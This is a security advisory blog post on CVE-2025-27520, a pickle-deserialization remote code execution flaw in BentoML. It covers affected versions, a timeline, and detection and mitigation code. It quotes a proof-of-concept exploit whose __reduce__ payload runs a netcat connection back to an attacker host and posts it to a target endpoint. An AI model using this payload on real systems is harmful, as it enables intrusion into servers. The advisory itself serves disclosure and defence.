CVE-2025-27520 Critical RCE In BentoML Has Fewer Affected Versions Than Reported - Checkmarx

April 10, 2025

A critical Remote Code Execution (RCE) vulnerability, CVE-2025-27520 with a CVSSv3 base score of 9.8, has been recently discovered in BentoML, an AI service helper Python library found on PyPI. This flaw allows unauthenticated attackers to execute arbitrary code by sending malicious data payloads as requests and potentially take control of the server. While the advisory specifies versions from 1.3.4 through 1.4.2 as affected, Checkmarx Zero’s analysis indicates that this issue affects versions 1.3.8 through 1.4.2 (see below for details). It is recommended that affected adopters upgrade to version 1.4.3 or later to repair the issue.

You are potentially affected by this issue if you use BentoML (either directly or indirectly) to receive and process ML “payloads” (serialized data structures) from untrusted sources. Since this is a primary purpose of BentoML, the presence of a vulnerable version of this library should be considered a significant indicator of risk.

Issue Description

CVE-2025-27520 is a Remote Code Execution (RCE) vulnerability found in BentoML, a Python library designed for creating online serving systems that are optimized for AI applications and model inference. The full GHSA advisory describes the vulnerability and its exploitation, which we summarize here. The flaw, which originates from insecure deserialization, enables adversaries to execute arbitrary code on the server by sending a specially crafted HTTP request. The issue exists because the deserialize_value() function in the “serde.py” file passes request data to pickle.loads() without validation, so attackers can inject malicious payloads that execute arbitrary code when they are deserialized.

def deserialize_value(self, payload: Payload) -> t.Any: 
    if "buffer-lengths" not in payload.metadata: 
        return pickle.loads(b"".join(payload.data))

Code snippet from the BentoML library source; this is the flaw that leads to the vulnerability.

This flaw is essentially a reintroduction of CVE-2024-2912, which had been previously fixed in version 1.2.5. Both CVEs deal with the exact same issue: an insecure deserialization vulnerability that can be exploited by sending an HTTP request to any valid endpoint to trigger RCE.

How To Exploit CVE-2025-27520

To exploit this vulnerability, the first step is to craft a malicious “pickle”, a binary data serialization system commonly used with Python. This “pickled” payload contains Python objects that can contain executable code that gets run when the payload is deserialized for use by the application. Vulnerable versions of BentoML do not deserialize such payloads in a safe manner, meaning an adversary can send Python code which performs malicious actions — including executing system commands — under the authority of the Python application running on the server.

In this case, an attacker can create a custom Python class (e.g. the Evil class) and override Python’s magic method __reduce__ so that it returns a tuple telling pickle to call the os.system function. The __reduce__ method specifies how an object is serialized and later reconstructed, and it allows users to replace the default behavior with other actions. By having pickle call os.system, an attacker can run system commands during deserialization, such as initiating a reverse shell connection to an attacker-controlled host, as shown in the provided Proof of Concept.

The attacker can then exploit the vulnerability by sending the maliciously crafted pickle payload to a vulnerable BentoML server via an HTTP request.

import pickle
import os
import requests

headers = {'Content-Type': 'application/vnd.bentoml+pickle'}

class Evil:
    def __reduce__(self):
        # start a netcat connection back to attacker-controlled host
        # any valid Python can be used here, this is a simple example
        return (os.system, ('nc 256.98.36.121 1234',))

payload = pickle.dumps(Evil())

# send malicious request to target server running BentoML-based application
requests.post("http://256.98.36.123:3000/summarize",
              data=payload, headers=headers)

Code sample from the GHSA advisory for this issue (GHSA-33xw-247w-6hmc), modified to make IP addresses invalid for safety and with additional comments.
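
To see why deserialization alone is enough to run code, the mechanism can be reproduced harmlessly. The sketch below is not part of the advisory: the Harmless class is a hypothetical stand-in for Evil, and operator.add stands in for os.system.

```python
import operator
import pickle


class Harmless:
    """Illustrative stand-in for the Evil class; it names a benign callable."""

    def __reduce__(self):
        # pickle stores this callable and its arguments in the payload.
        # On load, pickle calls operator.add(2, 3) instead of rebuilding
        # a Harmless object.
        return (operator.add, (2, 3))


payload = pickle.dumps(Harmless())
result = pickle.loads(payload)

# The caller receives whatever the callable returned, not a Harmless instance.
print(type(result).__name__, result)
```

The call happens inside pickle.loads() itself, before the application has a chance to inspect the result, which is why validating the deserialized object afterwards does not help.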

Exploitation of this vulnerability can allow adversaries to: 

  • Execute arbitrary code on the server, using privileges of a running Python application.
  • Control behavior of the affected system. 
  • Perform further attacks within the system’s connected network and services. 

How To Find, Mitigate and Repair CVE-2025-27520

The vulnerability exists in BentoML versions 1.3.8 through 1.4.2. If you are running a version within this range, you are affected. The advisory reports versions as early as 1.3.4 are vulnerable, but Checkmarx Zero analysts determined that the vulnerability actually re-emerged in version 1.3.8. By looking at commit 045001c3, we found that a previous security fix — originally introduced to address CVE-2024-2912 — had been removed. This missing code was specifically implemented to prevent this exact deserialization vulnerability now tracked as CVE-2025-27520.

In short, here’s the timeline of events:

  • The original vulnerability finding was reported as CVE-2024-2912.
  • It was patched in version 1.2.5
  • The fix was later removed in version 1.3.8
  • The same issue resurfaced and was reported again as CVE-2025-27520
  • It has now been re-patched in version 1.4.3

Checkmarx customers can use the SCA and container security products to identify whether their applications use a vulnerable version of BentoML or are exposed to other vulnerabilities. Otherwise, you can generate an SBOM using automated or manual processes and determine if an affected version of BentoML is installed as part of any of your Python application components’ dependency chain; it’s important to ensure that your SBOM process/tool can identify transitive (aka “indirect”) dependencies.

You can also examine running Python environments, looking in virtual environments and site-packages directories for entries that match `bentoml-VERSION.dist-info`, where VERSION is one of the affected versions. This method can produce false negatives if BentoML was installed without using a package manager.
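
A minimal sketch of that directory check follows, assuming the 1.3.8 through 1.4.2 range given above. The function names and the regular expression are illustrative rather than part of any Checkmarx or BentoML tool, and only the numeric major.minor.patch part of the version is compared, so pre-release or post-release suffixes are ignored.

```python
import re
from pathlib import Path

# Affected range per the analysis above: 1.3.8 through 1.4.2, inclusive.
FIRST_AFFECTED = (1, 3, 8)
LAST_AFFECTED = (1, 4, 2)

# Matches names such as "bentoml-1.4.2.dist-info"; any suffix after the
# patch number (for example "rc1") is tolerated but not compared.
DIST_INFO = re.compile(
    r"^bentoml-(\d+)\.(\d+)\.(\d+).*\.dist-info$", re.IGNORECASE
)


def is_affected(version):
    """Return True if a (major, minor, patch) tuple is in the affected range."""
    return FIRST_AFFECTED <= version <= LAST_AFFECTED


def find_bentoml_versions(root):
    """Yield (path, version, affected) for each BentoML dist-info under root."""
    for entry in Path(root).rglob("*.dist-info"):
        match = DIST_INFO.match(entry.name)
        if match:
            version = tuple(int(part) for part in match.groups())
            yield entry, version, is_affected(version)
```

Calling `find_bentoml_versions(sys.prefix)` from inside a virtual environment would walk that environment only; other interpreters, containers, and vendored copies need to be scanned separately.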

The simplest and most effective way to mitigate the issue is to upgrade BentoML to the patched version 1.4.3, where a fix commit (b35f4f4f) has been applied to reject HTTP requests with the Content-Type “application/vnd.bentoml+pickle”. This patch should be low risk for most users because it does not introduce any major code changes, and processing pickled content is not a common use case for BentoML adopters.

If upgrading is not possible, consider a custom mitigation such as a WAF configuration rule that blocks HTTP requests containing the “application/vnd.bentoml+pickle” Content-Type and serialized data in the request body. Such a rule is unlikely to fully eliminate the risk, and must be tested to ensure that it does not block legitimate application interactions.
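
The matching logic of such a rule can be sketched in Python as a generic ASGI wrapper. This is an illustration under assumptions, not a WAF configuration or a BentoML feature: RejectPickleMiddleware and is_pickle_request are hypothetical names, and how to place a wrapper like this in front of a particular BentoML deployment is not shown here.

```python
BLOCKED_CONTENT_TYPE = b"application/vnd.bentoml+pickle"


def is_pickle_request(headers):
    """Check ASGI-style headers, an iterable of (name, value) byte pairs."""
    for name, value in headers:
        if name.lower() == b"content-type":
            # Drop parameters such as "; charset=utf-8" before comparing.
            media_type = value.split(b";", 1)[0].strip().lower()
            if media_type == BLOCKED_CONTENT_TYPE:
                return True
    return False


class RejectPickleMiddleware:
    """Hypothetical ASGI wrapper that answers 415 before the app runs."""

    def __init__(self, app):
        self.app = app

    async def __call__(self, scope, receive, send):
        if scope["type"] == "http" and is_pickle_request(scope.get("headers", [])):
            await send({
                "type": "http.response.start",
                "status": 415,
                "headers": [(b"content-type", b"text/plain")],
            })
            await send({
                "type": "http.response.body",
                "body": b"Unsupported Media Type",
            })
            return
        # Every other request is passed through unchanged.
        await self.app(scope, receive, send)
```

Like a WAF rule, this only inspects the declared Content-Type, so it shares the limitation noted above and should be tested against legitimate traffic before use.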

Conclusion 

CVE-2025-27520 represents a significant risk to BentoML users, with potential for severe consequences if exploited. However, the reported range of affected versions in the advisory has been found to be incorrect by Checkmarx Zero; the vulnerability was reintroduced starting in version 1.3.8, not 1.3.4 as reported in the advisory. It is recommended that organizations upgrade to at least BentoML version 1.4.3 as soon as possible to mitigate the risk. 
